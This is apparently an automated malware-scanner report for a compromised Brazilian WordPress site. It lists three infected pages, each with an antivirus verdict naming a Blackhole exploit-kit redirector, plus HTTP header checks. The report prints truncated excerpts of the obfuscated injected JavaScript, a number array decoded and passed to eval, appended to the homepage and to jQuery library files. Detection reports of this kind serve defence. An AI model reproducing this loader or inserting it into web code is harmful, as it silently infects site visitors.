New scan:

Malware Scanner report for multitouch-brasil.com.br

Malicious/Suspicious/Total urls checked
3/0/5
3 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "multitouch-brasil.com.br" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=multitouch-brasil.com.br

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://multitouch-brasil.com.br/
200 OK
Content-Length: 110941
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

try{document["b"+"od"+"y"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3o","4d","46","3l","4c","41","47","46","16","3p","4a","3j","1e","3j","1i","3k","1f","4j","4a","3n","4c","4d","4a","46","16","2p","3j","4c","40","1k","3o","44","47","47","4a","1e","2p","3j","4c","40","1k","4a","3j","46","3m","47","45","1e","1f","1g","1e","3k","1j","3j","
... 2995 bytes are skipped ...
,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-733!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}

Antivirus reports:

AntiVir
JS/Agent.axquo
Avast
JS:Agent-AXQ [Trj]
Ikarus
Exploit.JS.Blacole
nProtect
Dropped:Trojan.JS.Iframe.CTY
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Comodo
TrojWare.JS.Agent.AXQ
McAfee-GW-Edition
Heuristic.LooksLike.HTML.Infected.B
TrendMicro
JS_BLACOLE.SMAP
Kaspersky
HEUR:Trojan.Script.Generic
Microsoft
Trojan:JS/BlacoleRef.CM
MicroWorld-eScan
Dropped:Trojan.JS.Iframe.CTY
Fortinet
JS/Blacole.HT!exploit
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
McAfee
JS/Exploit-Blacole.gc
F-Secure
Dropped:Trojan.JS.Iframe.CTY
AVG
HTML/Framer
Norman
BlacoleRef.AB
GData
Dropped:Trojan.JS.Iframe.CTY
BitDefender
Dropped:Trojan.JS.Iframe.CTY

http://multitouch-brasil.com.br/wp-content/themes/alkaline/js/jquery-1.3.2.min.js
200 OK
Content-Length: 61321
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 3079 bytes are skipped ...
","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-733!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}/*11d26d6352531e647b7c29de7994b931*/

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.104
Avast
JS:Decode-ARV [Trj]
Ad-Aware
Trojan.JS.Iframe.CTY
Ikarus
Exploit.JS.Blacole
nProtect
Trojan.JS.Iframe.CTY
K7AntiVirus
Exploit ( 04c5592b1 )
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Emsisoft
Trojan.JS.Iframe.CTY (B)
Comodo
TrojWare.JS.Blacole.YA
CAT-QuickHeal
JS/BlacoleRef.CN
K7GW
Exploit ( 04c5592b1 )
McAfee-GW-Edition
JS/Exploit-Blacole.eu
DrWeb
Exploit.BlackHole.139
TrendMicro
JS_BLACOLE.SMAP
Microsoft
Trojan:JS/BlacoleRef.CM
MicroWorld-eScan
Trojan.JS.Iframe.CTY
McAfee
JS/Exploit-Blacole.eu
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
Trojan.JS.Iframe.CTY
AVG
HTML/Framer
Norman
Exploit.AIX
Sophos
Troj/JSRedir-KB
GData
Trojan.JS.Iframe.CTY
Symantec
JS.Runfore
BitDefender
Trojan.JS.Iframe.CTY

http://multitouch-brasil.com.br/wp-content/themes/alkaline/js/jquery.cycle.all.min.js
200 OK
Content-Length: 31813
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

;(function($){var ver="2.63";if($.support==undefined){$.support={opacity:!($.browser.msie)};}function log(){if(window.console&&window.console.log){window.console.log("[cycle] "+Array.prototype.join.call(arguments," "));}}$.fn.cycle=function(options,arg2){var o={s:this.selector,c:this.context};if(this.length==0&&options!="stop"){if(!$.isReady&&o.s){log("DOM not ready, queuing slideshow");$(function(){$(o.s,o.c).cycle(options,arg2);});return this;}log("terminating; zero ele
... 3027 bytes are skipped ...
,"1f","27","d","a","9","3m","47","3l","4d","45","3n","46","4c","1k","3l","47","47","43","41","3n","29","1d","4c","3n","4b","4c","3l","47","47","43","41","3n","1n","29","1d","1h","4a","4b","1e","1f","1h","1d","27","16","3n","4g","48","41","4a","3n","4b","29","1d","1h","3n","4g","48","1k","4c","47","2j","2p","36","35","4c","4a","41","46","3p","1e","1f","27","d","a","4l"];h=2;s="";if(zxc){for(i=0;i-733!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],12*2+2));}z=s;vl="val";if(ww.document)eval(z)}}}

Antivirus reports:

Qihoo-360
Trojan.Generic
AntiVir
JS/BlacoleRef.W.104
Avast
JS:Decode-ARV [Trj]
Ad-Aware
Trojan.JS.Iframe.CTY
Ikarus
Exploit.JS.Blacole
nProtect
Trojan.JS.Iframe.CTY
K7AntiVirus
Exploit ( 04c5592b1 )
TrendMicro-HouseCall
JS_BLACOLE.SMAP
Emsisoft
Trojan.JS.Iframe.CTY (B)
Comodo
TrojWare.JS.Blacole.YA
CAT-QuickHeal
JS/BlacoleRef.CN
K7GW
Exploit ( 04c5592b1 )
McAfee-GW-Edition
JS/Exploit-Blacole.ht
TrendMicro
JS_BLACOLE.SMAP
Microsoft
Trojan:JS/BlacoleRef.CM
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
Trojan.JS.Iframe.CTY
Fortinet
JS/Blacole.HT!exploit
McAfee
JS/Exploit-Blacole.ht
NANO-Antivirus
Trojan.Script.Blackhole.bekghp
F-Secure
Trojan.JS.Iframe.CTY
AVG
HTML/Framer
Norman
Exploit.AIX
GData
Trojan.JS.Iframe.CTY
Symantec
JS.Runfore
BitDefender
Trojan.JS.Iframe.CTY

http://multitouch-brasil.com.br/wp-content/themes/alkaline/js/main.js
500 timeout
Content-Length: 30
Content-Type: text/plain
clean
http://multitouch-brasil.com.br/test404page.js
404 Not Found
Content-Length: 293
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: multitouch-brasil.com.br

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 18:50:09 GMT
Server: Apache/2.2.22
Vary: User-Agent
Content-Encoding: none
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=c9363b390e34bbbec621835129dfb960; path=/
Set-Cookie: wordpress_e88c19925046e3d1a2011427b091a2b6=%7C1426618210%7Cef5e62a105eb136d565719f19700462a; expires=Tue, 17-Mar-2015 18:50:10 GMT; path=/wp-content/plugins; httponly
Set-Cookie: wordpress_e88c19925046e3d1a2011427b091a2b6=%7C1426618210%7Cef5e62a105eb136d565719f19700462a; expires=Tue, 17-Mar-2015 18:50:10 GMT; path=/wp-admin; httponly
Set-Cookie: wordpress_logged_in_e88c19925046e3d1a2011427b091a2b6=%7C1426618210%7C92e40e3a78a8ad60d1c70392da4c20e3; expires=Tue, 17-Mar-2015 18:50:10 GMT; path=/; httponly
X-Pingback: http://multitouch-brasil.com.br/xmlrpc.php
X-Powered-By: PHP/5.3.29
Second query (visit from search engine):
GET / HTTP/1.1
Host: multitouch-brasil.com.br
Referer: http://www.google.com/search?q=multitouch-brasil.com.br

Result:
The result is similar to the first query. There are no suspicious redirects found.